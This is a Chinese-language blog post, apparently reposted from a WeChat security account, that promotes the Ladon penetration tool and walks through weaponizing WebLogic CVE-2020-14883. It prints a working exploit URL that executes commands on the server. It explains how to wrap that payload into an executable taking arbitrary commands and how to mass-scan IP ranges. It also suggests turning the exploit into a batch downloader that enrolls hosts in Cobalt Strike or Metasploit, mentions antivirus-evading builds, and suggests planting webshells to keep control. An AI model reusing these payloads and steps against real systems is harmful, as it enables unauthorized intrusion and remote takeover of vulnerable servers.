Ladon简介:
Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。10.9版本内置200个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMPNBTDNSMACSMBWMISSHHTTPHTTPSExchangemssqlFTPRDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotatoBadPotatoEfsPotatoBypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
版本说明:
Ladon911 完整功能版,体积大,易被杀,可本地测试、研究学习复现旧漏洞
Ladon 10.8版本起Ladon.exe默认在Win11或装有.NET 4.8下使用效果最佳
Ladon40 Win10或装有.NET 4.0或以上系统下使用 安装有4.8建议优先Ladon
Ladon35 Win7/2008或装有.NET 3.x系统下使用 安装有4.8的建议优先Ladon
Win7-Win2022或装有PowerShell系统,可远程内存加载无文件渗透
NimLadon Nim免杀Ladon,可过部分杀软,可用net2nim工具 自行转换
CS插件,一键使用,内存加载,无需将EXE上传目标,无文件渗透
LadonGUI 辅助工具,含免杀、文本处理、加密解密、反弹Shell、子域名等
LadonEXP EXP生成器,一键生成Poc、EXP,快速扩展Ladon批量GetShell能力
LadonStudy 学习模式,一键渗透,对Ladon不熟的人,也可快速实战GetShell
ChatLadon 渗透机器人,也可当成学习模式,只要会聊天,就能让Ladon干活
Ladon 10.9 20230305
[911版保留 SMB漏洞 永恒之黑 ]SmbGhost 仅
[911版保留 漏洞太老 概率低 ]VsFtpDoor 仅
[ ]Ladon Study 新增小图标 界面直观 便于区分 一眼找到常用功能
[ ]LadonGUI 修复RevShell生成Ladon PowerShell反弹命令错误的Bug
[ ]JoomlaPwd 域名解析IP TAB分隔 IP 用户 密码 方便MysqlScan检测
[ ]WhatCMS
WebLogic 14.1.1.0.0
WebLogic 12.2.1.4.0
WebLogic 12.2.1.3.0
WebLogic 12.2
WebLogic 10.3.6.0
WebLogic 10.3
WebLogic
WebLogic[maybe]
Ladon 10.9 20230302
[ ]LadonExp 编译EXE支持执行CMD Payload变量$cmd$ 变量$b64cmd$
[ ]web CS版不含该模块 识别JAVA JNDI_LDAP JNDI_RMI请求
[-2020-14883高危漏洞检测可识别出Windows或Linux ]WebLogicPoc CVE
[ ]PortTran CS版移除 端口转发工具
[ ]Ladon911 本地测试用的全功能版(即保留旧漏洞和一些过时功能)
[911版保留 功能很多 建议看Wiki或Ladon Study ]Help 仅
[911版保留 Win10默认自动更新,实战遇到概率低 ]SMBGhost 仅CS和
[911版保留 2011漏洞过旧,实战遇到概率低 ]vsFTPdPoc 仅CS和
[-2021-36934 仅CS和911版保留 Win10默认自动更新,实战可用概率低 ]CVE
[911版保留 ]PhpStudyPoc 仅CS和
WebLogic漏洞复现例子 CVE-2020-14883
影响版本:10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
POC:
http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
稍微改一下,通过LadonEXP可快速生成高效批量检测POC,当然大家也可以构造成批量执行下载者,自动上线CS或MSF等。
PS: 双击文本框可展开或收缩,查看payload
Ladon内置WebLogicPoc模块包含多个漏洞POC,使用以下命令可轻松检测
Ladon 192.168.1.8 WeblogicPoc 扫IP默认7001 7002端口
Ladon 192.168.1.8/24 WeblogicPoc 扫C段默认7001 7002端口
Ladon 192.168.1.8:8088 WeblogicPoc 指定IP端口
Ladon http://192.168.1.8:7003 WeblogicPoc 指定URL
Ladon ip.txt WeblogicPoc 批量IP
Ladon ip24.txt WeblogicPoc 批量C段
Ladon url.txt WeblogicPoc 批量URL
使用该模块检测到不少站点还存在两三年前的漏洞,如CVE-2020-14883
命令执行
检测 到漏洞后,我们可以使用Burp发包执行命令,但是这样很麻烦,执行一次命令,就得改一下payload,提交过程中要是不小心按到怎么按键,多了一个字符进去,如果执行一些长命令,本身命令还需要转义。执行命令的时候报错了,不知道究竟是命令错还是payload错,就因为一两字符错浪费时间。
可以将payload中的whoami命令替换成$cmd$变量,然后生成EXE,这样就可以生成一个可执行自定义命令的漏洞工具,无需每次都手动修改然后再发包,原本需要复杂的反序列化payload,瞬间变成了简单的cmd命令执行。整个过程无需编程基础,轻轻松松就制作属于自己的EXP工具。
PS: 由于是漏洞执行命令,有些漏洞可能有部份命令不可执行,遇到这种情况,可以上传相关WebShell控守,而且漏洞也可能会补,所以漏洞不能当作长期执行命令工具。
ChatLadon 说人话自动渗透
原文始发于微信公众号(K8实验室):LadonEXP可自定义变量,一键武器化
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论